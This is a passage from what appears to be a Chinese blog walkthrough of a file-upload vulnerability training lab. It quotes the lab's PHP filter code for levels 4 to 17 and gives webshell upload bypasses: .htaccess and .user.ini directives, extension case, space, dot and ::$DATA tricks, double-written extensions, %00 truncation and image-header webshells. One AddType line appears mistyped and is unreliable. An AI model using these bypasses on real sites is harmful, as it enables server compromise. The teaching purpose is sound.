class="string">&#x27;文件夹不存在,请手工创建！&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>他经过了许多步</p>
<p>但其实他只匹配了<code>$deny_ext = array(&#39;.asp&#39;,&#39;.aspx&#39;,&#39;.php&#39;,&#39;.jsp&#39;);</code></p>
<p>修改为 php1，php2，php3，php4，php5，phtml 等 与 php 解析相同的后缀皆可</p>
<h2 id="pass-04"><a href="#pass-04" class="headerlink" title="pass-04"></a>pass-04</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) &#123;</span><br><span class="line">        <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">&quot;.php&quot;</span>,<span class="string">&quot;.php5&quot;</span>,<span class="string">&quot;.php4&quot;</span>,<span class="string">&quot;.php3&quot;</span>,<span class="string">&quot;.php2&quot;</span>,<span class="string">&quot;.php1&quot;</span>,<span class="string">&quot;.html&quot;</span>,<span class="string">&quot;.htm&quot;</span>,<span class="string">&quot;.phtml&quot;</span>,<span class="string">&quot;.pht&quot;</span>,<span class="string">&quot;.pHp&quot;</span>,<span class="string">&quot;.pHp5&quot;</span>,<span class="string">&quot;.pHp4&quot;</span>,<span class="string">&quot;.pHp3&quot;</span>,<span class="string">&quot;.pHp2&quot;</span>,<span class="string">&quot;.pHp1&quot;</span>,<span class="string">&quot;.Html&quot;</span>,<span class="string">&quot;.Htm&quot;</span>,<span class="string">&quot;.pHtml&quot;</span>,<span class="string">&quot;.jsp&quot;</span>,<span class="string">&quot;.jspa&quot;</span>,<span class="string">&quot;.jspx&quot;</span>,<span class="string">&quot;.jsw&quot;</span>,<span class="string">&quot;.jsv&quot;</span>,<span class="string">&quot;.jspf&quot;</span>,<span class="string">&quot;.jtml&quot;</span>,<span class="string">&quot;.jSp&quot;</span>,<span class="string">&quot;.jSpx&quot;</span>,<span class="string">&quot;.jSpa&quot;</span>,<span class="string">&quot;.jSw&quot;</span>,<span class="string">&quot;.jSv&quot;</span>,<span class="string">&quot;.jSpf&quot;</span>,<span class="string">&quot;.jHtml&quot;</span>,<span class="string">&quot;.asp&quot;</span>,<span class="string">&quot;.aspx&quot;</span>,<span class="string">&quot;.asa&quot;</span>,<span class="string">&quot;.asax&quot;</span>,<span class="string">&quot;.ascx&quot;</span>,<span class="string">&quot;.ashx&quot;</span>,<span class="string">&quot;.asmx&quot;</span>,<span class="string">&quot;.cer&quot;</span>,<span class="string">&quot;.aSp&quot;</span>,<span class="string">&quot;.aSpx&quot;</span>,<span class="string">&quot;.aSa&quot;</span>,<span class="string">&quot;.aSax&quot;</span>,<span class="string">&quot;.aScx&quot;</span>,<span class="string">&quot;.aShx&quot;</span>,<span class="string">&quot;.aSmx&quot;</span>,<span class="string">&quot;.cEr&quot;</span>,<span class="string">&quot;.sWf&quot;</span>,<span class="string">&quot;.swf&quot;</span>,<span class="string">&quot;.ini&quot;</span>);</span><br><span class="line">        <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">        <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line">        <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">&#x27;.&#x27;</span>);</span><br><span class="line">        <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line">        <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">&#x27;::$DATA&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line">        <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) &#123;</span><br><span class="line">            <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$file_name</span>;</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) &#123;</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&#x27;此文件不允许上传!&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">&#x27;文件夹不存在,请手工创建！&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这回匹配的倒挺多</p>
<p>不过配置文件没过滤</p>
<p>上传.htaccess 文件</p>
<p>写入下面两句中的一句即可</p>
<p>第一句是全按 php 解析</p>
<p>第二句是将 jpg 按 php 解析</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">SetHandler application/x-httpd-php</span><br><span class="line">AddType application/x-https-php .jpg</span><br></pre></td></tr></table></figure>

<h2 id="pass-05"><a href="#pass-05" class="headerlink" title="pass-05"></a>pass-05</h2><p>和第 4 关类似</p>
<p>写入.user.ini 文件</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line"><span class="attr">auto_prepend_file</span>=shell.jpg</span><br></pre></td></tr></table></figure>

<p>再配合 shell</p>
<h2 id="pass-06"><a href="#pass-06" class="headerlink" title="pass-06"></a>pass-06</h2><p>这一关源码补上了之前漏网的配置文件</p>
<p>但是这里可以使用大小写绕过</p>
<p>例如.Php</p>
<h2 id="pass-07"><a href="#pass-07" class="headerlink" title="pass-07"></a>pass-07</h2><p>这里补了一句</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br></pre></td></tr></table></figure>

<p>没法大小写绕过了</p>
<p>这里通过补空格来绕过</p>
<p><code>.php (空格)</code></p>
<h2 id="pass-08"><a href="#pass-08" class="headerlink" title="pass-08"></a>pass-08</h2><p>这里补了句首位去空</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br></pre></td></tr></table></figure>

<p>这次用 . 绕过</p>
<p><code>.php.</code></p>
<p>和上面一样</p>
<p>后面的空格和 . 会被服务器自动删除</p>
<h2 id="pass-09"><a href="#pass-09" class="headerlink" title="pass-09"></a>pass-09</h2><p>这里补了</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br></pre></td></tr></table></figure>

<p>比之前少了一句</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">&#x27;::$DATA&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br></pre></td></tr></table></figure>

<p>使用</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">.php::$DATA</span><br></pre></td></tr></table></figure>

<h2 id="pass-10"><a href="#pass-10" class="headerlink" title="pass-10"></a>pass-10</h2><p>这里补回了::$DATA 仔细看这里过滤的顺序</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$deny_ext</span>=<span class="keyword">array</span>(<span class="string">&quot;.php&quot;</span>,<span class="string">&quot;.php5&quot;</span>,<span class="string">&quot;.php4&quot;</span>,<span class="string">&quot;.php3&quot;</span>,<span class="string">&quot;.php2&quot;</span>,<span class="string">&quot;.html&quot;</span>,<span class="string">&quot;.htm&quot;</span>,<span class="string">&quot;.phtml&quot;</span>,<span class="string">&quot;.pht&quot;</span>,<span class="string">&quot;.pHp&quot;</span>,<span class="string">&quot;.pHp5&quot;</span>,<span class="string">&quot;.pHp4&quot;</span>,<span class="string">&quot;.pHp3&quot;</span>,<span class="string">&quot;.pHp2&quot;</span>,<span class="string">&quot;.Html&quot;</span>,<span class="string">&quot;.Htm&quot;</span>,<span class="string">&quot;.pHtml&quot;</span>,<span class="string">&quot;.jsp&quot;</span>,<span class="string">&quot;.jspa&quot;</span>,<span class="string">&quot;.jspx&quot;</span>,<span class="string">&quot;.jsw&quot;</span>,<span class="string">&quot;.jsv&quot;</span>,<span class="string">&quot;.jspf&quot;</span>,<span class="string">&quot;.jtml&quot;</span>,<span class="string">&quot;.jSp&quot;</span>,<span class="string">&quot;.jSpx&quot;</span>,<span class="string">&quot;.jSpa&quot;</span>,<span class="string">&quot;.jSw&quot;</span>,<span class="string">&quot;.jSv&quot;</span>,<span class="string">&quot;.jSpf&quot;</span>,<span class="string">&quot;.jHtml&quot;</span>,<span class="string">&quot;.asp&quot;</span>,<span class="string">&quot;.aspx&quot;</span>,<span class="string">&quot;.asa&quot;</span>,<span class="string">&quot;.asax&quot;</span>,<span class="string">&quot;.ascx&quot;</span>,<span class="string">&quot;.ashx&quot;</span>,<span class="string">&quot;.asmx&quot;</span>,<span class="string">&quot;.cer&quot;</span>,<span class="string">&quot;.aSp&quot;</span>,<span class="string">&quot;.aSpx&quot;</span>,<span class="string">&quot;.aSa&quot;</span>,<span class="string">&quot;.aSax&quot;</span>,<span class="string">&quot;.aScx&quot;</span>,<span class="string">&quot;.aShx&quot;</span>,<span class="string">&quot;.aSmx&quot;</span>,<span class="string">&quot;.cEr&quot;</span>,<span class="string">&quot;.sWf&quot;</span>,<span class="string">&quot;.swf&quot;</span>,<span class="string">&quot;.htaccess&quot;</span>,<span class="string">&quot;.ini&quot;</span>);</span><br><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line"><span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">&#x27;.&#x27;</span>);</span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">&#x27;::$DATA&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line"><span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//首尾去空</span></span><br></pre></td></tr></table></figure>

<p>仔细看这里过滤的顺序</p>
<p>先去的点然后去的空</p>
<p>于是可以</p>
<p><code>.php. .</code></p>
<p>过滤后剩下</p>
<p><code>.php.</code></p>
<h2 id="pass-11"><a href="#pass-11" class="headerlink" title="pass-11"></a>pass-11</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) &#123;</span><br><span class="line">        <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">&quot;php&quot;</span>,<span class="string">&quot;php5&quot;</span>,<span class="string">&quot;php4&quot;</span>,<span class="string">&quot;php3&quot;</span>,<span class="string">&quot;php2&quot;</span>,<span class="string">&quot;html&quot;</span>,<span class="string">&quot;htm&quot;</span>,<span class="string">&quot;phtml&quot;</span>,<span class="string">&quot;pht&quot;</span>,<span class="string">&quot;jsp&quot;</span>,<span class="string">&quot;jspa&quot;</span>,<span class="string">&quot;jspx&quot;</span>,<span class="string">&quot;jsw&quot;</span>,<span class="string">&quot;jsv&quot;</span>,<span class="string">&quot;jspf&quot;</span>,<span class="string">&quot;jtml&quot;</span>,<span class="string">&quot;asp&quot;</span>,<span class="string">&quot;aspx&quot;</span>,<span class="string">&quot;asa&quot;</span>,<span class="string">&quot;asax&quot;</span>,<span class="string">&quot;ascx&quot;</span>,<span class="string">&quot;ashx&quot;</span>,<span class="string">&quot;asmx&quot;</span>,<span class="string">&quot;cer&quot;</span>,<span class="string">&quot;swf&quot;</span>,<span class="string">&quot;htaccess&quot;</span>,<span class="string">&quot;ini&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">        <span class="variable">$file_name</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="variable">$deny_ext</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$file_name</span>);</span><br><span class="line">        <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">        <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$file_name</span>;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) &#123;</span><br><span class="line">            <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">&#x27;文件夹不存在,请手工创建！&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里用 trim 函数删去通过<code>$_FILES[&#39;upload_ext&#39;][&#39;tmp_name&#39;]</code>得到的浏览器通过报文传过来的在 burpsuite 中的变量名是 filename 的字符串左右两边的空格 这就省了几步过滤</p>
<p>但是下面这句</p>
<p><code>$file_name = str_ireplace($deny_ext,&quot;&quot;, $file_name);</code></p>
<p>是匹配到黑名单后替换成空</p>
<p>于是这里可以双写绕过</p>
<p><code>.pphphp</code></p>
<h2 id="pass-12"><a href="#pass-12" class="headerlink" title="pass-12"></a>pass-12</h2><p>这次使用了白名单过滤</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$ext_arr</span> = <span class="keyword">array</span>(<span class="string">&#x27;jpg&#x27;</span>,<span class="string">&#x27;png&#x27;</span>,<span class="string">&#x27;gif&#x27;</span>);</span><br><span class="line">    <span class="variable">$file_ext</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>],<span class="title function_ invoke__">strrpos</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>],<span class="string">&quot;.&quot;</span>)+<span class="number">1</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$ext_arr</span>))&#123;</span><br><span class="line">        <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">        <span class="variable">$img_path</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;save_path&#x27;</span>].<span class="string">&quot;/&quot;</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">&quot;YmdHis&quot;</span>).<span class="string">&quot;.&quot;</span>.<span class="variable">$file_ext</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>))&#123;</span><br><span class="line">            <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="variable">$msg</span> = <span class="string">&quot;只允许上传.jpg|.png|.gif类型文件！&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>讲一下 00 截断的原理，在服务器读到十六进制编码为 00 时就会停止读取，而 save_path 是通过 GET 传参的 00 的 GET 传参的数据最终都会经过 URL 解码而%00 解码之后就是十六进制对应的 00，这就导致 move_uploaded_file 函数会读到 00 就结束从而上传成功</p>
</blockquote>
<p><code>.php%00</code></p>
<h2 id="pass-13"><a href="#pass-13" class="headerlink" title="pass-13"></a>pass-13</h2><p>代码和十二关一样，只是 save_path 改用 POST 传参了</p>
<p>burpsuite 自带的 16 进制编辑器改 16 进制</p>
<p>找到文件名后缀后面的 0 被改为 00</p>
<h2 id="pass-14"><a href="#pass-14" class="headerlink" title="pass-14"></a>pass-14</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getReailFileType</span>(<span class="params"><span class="variable">$filename</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$file</span> = <span class="title function_ invoke__">fopen</span>(<span class="variable">$filename</span>, <span class="string">&quot;rb&quot;</span>);<span class="comment">//以只读 二进制方式打开</span></span><br><span class="line">    <span class="variable">$bin</span> = <span class="title function_ invoke__">fread</span>(<span class="variable">$file</span>, <span class="number">2</span>); <span class="comment">//只读2字节</span></span><br><span class="line">    <span class="title function_ invoke__">fclose</span>(<span class="variable">$file</span>);</span><br><span class="line">    <span class="variable">$strInfo</span> = @<span class="title function_ invoke__">unpack</span>(<span class="string">&quot;C2chars&quot;</span>, <span class="variable">$bin</span>);<span class="comment">//从二进制字符串对数据进行解包</span></span><br><span class="line">    <span class="comment">//&#x27;C2char&#x27;的意思是二进制文件类型是&#x27;unsigned char&#x27;转换为char类型最终返回值是一个数组。之后将数组返还给$strinfo函数。</span></span><br><span class="line">    <span class="variable">$typeCode</span> = <span class="title function_ invoke__">intval</span>(<span class="variable">$strInfo</span>[<span class="string">&#x27;chars1&#x27;</span>].<span class="variable">$strInfo</span>[<span class="string">&#x27;chars2&#x27;</span>]);<span class="comment">//将$strinfo中的每一个元素转变为int型并且拼接输出给 $typeCode</span></span><br><span class="line">    <span class="variable">$fileType</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="keyword">switch</span>(<span class="variable">$typeCode</span>)&#123;<span class="comment">//switch匹配</span></span><br><span class="line">        <span class="keyword">case</span> <span class="number">255216</span>:</span><br><span class="line">            <span class="variable">$fileType</span> = <span class="string">&#x27;jpg&#x27;</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="number">13780</span>:</span><br><span class="line">            <span class="variable">$fileType</span> = <span class="string">&#x27;png&#x27;</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="number">7173</span>:</span><br><span class="line">            <span class="variable">$fileType</span> = <span class="string">&#x27;gif&#x27;</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">default</span>:</span><br><span class="line">            <span class="variable">$fileType</span> = <span class="string">&#x27;unknown&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$fileType</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">    <span class="variable">$file_type</span> = <span class="title function_ invoke__">getReailFileType</span>(<span class="variable">$temp_file</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$file_type</span> == <span class="string">&#x27;unknown&#x27;</span>)&#123;</span><br><span class="line">        <span class="variable">$msg</span> = <span class="string">&quot;文件未知，上传失败！&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">&quot;/&quot;</span>.<span class="title function_ invoke__">rand</span>(<span class="number">10</span>, <span class="number">99</span>).<span class="title function_ invoke__">date</span>(<span class="string">&quot;YmdHis&quot;</span>).<span class="string">&quot;.&quot;</span>.<span class="variable">$file_type</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>))&#123;</span><br><span class="line">            <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&quot;上传出错！&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里本质上是检验的文件头</p>
<p>只要做个文件头正确的图片 🐎 即可</p>
<h2 id="pass-15"><a href="#pass-15" class="headerlink" title="pass-15"></a>pass-15</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isImage</span>(<span class="params"><span class="variable">$filename</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$types</span> = <span class="string">&#x27;.jpeg|.png|.gif&#x27;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">file_exists</span>(<span class="variable">$filename</span>))&#123;</span><br><span class="line">        <span class="variable">$info</span> = <span class="title function_ invoke__">getimagesize</span>(<span class="variable">$filename</span>);<span class="comment">//获取文件信息</span></span><br><span class="line">        <span class="variable">$ext</span> = <span class="title function_ invoke__">image_type_to_extension</span>(<span class="variable">$info</span>[<span class="number">2</span>]);<span class="comment">//返回文件后缀</span></span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">stripos</span>(<span class="variable">$types</span>,<span class="variable">$ext</span>)&gt;=<span class="number">0</span>)&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="variable">$ext</span>;</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里上传图片 🐎 即可</p>
<h2 id="pass-16"><a href="#pass-16" class="headerlink" title="pass-16"></a>pass-16</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$image_type</span> = <span class="title function_ invoke__">exif_imagetype</span>(<span class="variable">$filename</span>);</span><br></pre></td></tr></table></figure>

<p>这里的函数替代 15 关的</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$info</span> = <span class="title function_ invoke__">getimagesize</span>(<span class="variable">$filename</span>);<span class="comment">//获取文件信息</span></span><br><span class="line"><span class="variable">$ext</span> = <span class="title function_ invoke__">image_type_to_extension</span>(<span class="variable">$info</span>[<span class="number">2</span>]);<span class="comment">//返回文件后缀</span></span><br></pre></td></tr></table></figure>

<p>还是图片 🐎 即可</p>
<h2 id="pass-17"><a href="#pass-17" class="headerlink" title="pass-17"></a>pass-17</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">    <span class="comment">// 获得上传文件的基本信息，文件名，类型，大小，临时文件路径</span></span><br><span class="line">    <span class="variable">$filename</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">    <span class="variable">$filetype</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>];</span><br><span class="line">    <span class="variable">$tmpname</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="variable">$target_path</span>=UPLOAD_PATH.<span class="string">&#x27;/&#x27;</span>.<span class="title function_ invoke__">basename</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 获得上传文件的扩展名</span></span><br><span class="line">    <span class="variable">$fileext</span>= <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">strrchr</span>(<span class="variable">$filename</span>,<span class="string">&quot;.&quot;</span>),<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">//判断文件后缀与类型，合法才进行上传操作</span></span><br><span class="line">    <span class="keyword">if</span>((<span class="variable">$fileext</span> == <span class="string">&quot;jpg&quot;</span>) &amp;&amp; (<span class="variable">$filetype</span>==<span class="string">&quot;image/jpeg&quot;</span>))&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$tmpname</span>,<span class="variable">$target_path</span>))&#123;</span><br><span class="line">            <span class="comment">//使用上传的图片生成新的图片</span></span><br><span class="line">            <span class="variable">$im</span> = <span class="title function_ invoke__">imagecreatefromjpeg</span>(<span class="variable">$target_path</span>);</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$im</span> == <span class="literal">false</span>)&#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&quot;该文件不是jpg格式的图片！&quot;</span>;</span><br><span class="line">                @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line">            &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="comment">//给新图片指定文件名</span></span><br><span class="line">                <span class="title function_ invoke__">srand</span>(<span class="title function_ invoke__">time</span>());</span><br><span class="line">                <span class="variable">$newfilename</span> = <span class="title function_ invoke__">strval</span>(<span class="title function_ invoke__">rand</span>()).<span class="string">&quot;.jpg&quot;</span>;</span><br><span class="line">                <span class="comment">//显示二次渲染后的图片（使用用户上传图片生成的新图片）</span></span><br><span class="line">                <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">&#x27;/&#x27;</span>.<span class="variable">$newfilename</span>;</span><br><span class="line">                <span class="title function_ invoke__">imagejpeg</span>(<span class="variable">$im</span>,<span class="variable">$img_path</span>);</span><br><span class="line">                @<span class="title function_ invoke__">unlink</span>(<span class="variable">$target_path</span>);</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&quot;上传出错！&quot;</span>;</span><br><span class="line">        &#125;</span><br><span 